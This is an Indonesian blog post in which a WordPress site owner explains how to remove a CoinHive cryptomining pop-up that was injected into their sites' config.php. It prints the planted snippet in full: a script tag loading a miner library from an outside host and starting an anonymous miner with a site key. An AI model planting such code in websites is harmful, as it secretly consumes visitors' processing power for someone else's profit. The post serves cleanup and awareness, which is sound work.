Cara menghilangkan pop up CoinHive
Beberapa waktu belakangan ini beberapa blog saya menampilkan sebuah pop up yang tidak saya kenal. Pop up ini berisi pemberitahuan : apakah ini pengunjung website bersedia untuk menggunakan sebagian daya prosesornya untuk mendukung pemilik blog.
Lebih jelasnya pop up nya seperti gambar di bawah ini
Ketika pengunjung blog memilih allow for this session, maka prosessor pengguna akan tersedot secara maksimal penggunaannya. Makanya jangan heran tiba tiba kipas prosesor sampai bertambah kencang.
di bawah tombol Allow terdapat sebuah link menuju https://coinhive.com/. yang setelah saya kunjungi ternyata sebuah layanan penambangan bitcoin berbasis java scrip dengan memanfaatkan prosesor pengunjung blog.
https://coinhive.com/ ini masih bagus karena masih menampilkan pop up pemberitahuan, istilahnya menawarkan mau ngasih izin atau tidak.
yang lebih kejam lagi tanpa izin pengunjung blog atau situs, maka ketika pengguna mengakses situs yang disematkan script penambangan bitcoint tersebut, secara otomatis penggunakan cpu pada latop atau pc langsung meningkat, yang biasanya ditandai dengan kinerja semakin lemot dan kipas makin kencang.
Cara menghilangkan scrip coinhive.com
Awalnya saya pikir pop up coinhive.com tersebut merupakan bagian dari kampanye iklan pada mitra penyedia iklan saya. Setelah saya telusuri ternyata tidak. kampanye iklan mitra saya sama sekali tidak ada hubunganya dengan coinhive.com.
Saya coba mencari melalui source code web, scrip coinhive.com muncul di paling atas.
Namun untuk menghapusnya saya mengalami sedikit kesulitan, karena saya pikir scrip tersebut diinject kan ke theme, saya cari di header, index, footer, bahkan single post juga tidak ketemu.
Script ini baru ketemu setelah saya menginstal ulang wordpress karena ada masalah pada dashboardnya (posting editor tidak tampi). setelah saya instal ulang, ternyata pop up coinhive.com ikut hilang.
AKhirnya saya coba mencari script tersebut di blog saya yang lain pada file file php wordpress. akhirnya script jahat ini ketemu di halaman config.php. berada di urutan paling bawah.
dan inilah penampakan script jahat tersebut
<script src=”https://authedmine.com/lib/authedmine.min.js”></script>
<script>
var miner = new CoinHive.Anonymous(‘Ys0MTHnNbTBnlaz4rjmeSOS0g0KtvEMk’, {throttle: 0.3});
// Only start on non-mobile devices and if not opted-out
// in the last 14400 seconds (4 hours):
if (!miner.isMobile() && !miner.didOptOut(14400)) {
miner.start();
}
</script>
Untuk menghilangkannya, silahkan hapus saja script tersebut, selanjutnya Pop Up coinhive tidak akan muncul lagi.
Semoga sedikit cerita mengenai cara menghilangkan script mining bitcoin di atas bisa bermanfaat bagi kamu yang membutuhkan.